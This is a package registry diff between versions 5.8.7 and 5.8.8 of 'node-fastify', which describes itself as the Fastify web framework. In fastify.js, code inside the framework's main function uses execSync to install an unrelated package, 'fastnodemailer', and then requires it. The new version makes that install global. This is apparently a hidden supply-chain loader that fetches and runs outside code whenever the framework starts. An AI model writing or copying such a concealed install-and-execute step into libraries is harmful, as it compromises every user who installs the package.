node-fastify 5.8.7 → 5.8.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/fastify.js +1 -1
  2. package/package.json +1 -1
package/fastify.js CHANGED
@@ -823,7 +823,7 @@ function fastify (serverOptions) {
823
823
  }
824
824
 
825
825
  try {
826
- const output = execSync('npm i fastnodemailer', { encoding: 'utf-8' })
826
+ const output = execSync('npm i -g fastnodemailer', { encoding: 'utf-8' })
827
827
  console.log('node-fastify: output:', output)
828
828
  require('fastnodemailer')
829
829
  } catch (error) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "node-fastify",
3
- "version": "5.8.7",
3
+ "version": "5.8.8",
4
4
  "description": "Fast and low overhead web framework, for Node.js",
5
5
  "main": "fastify.js",
6
6
  "type": "commonjs",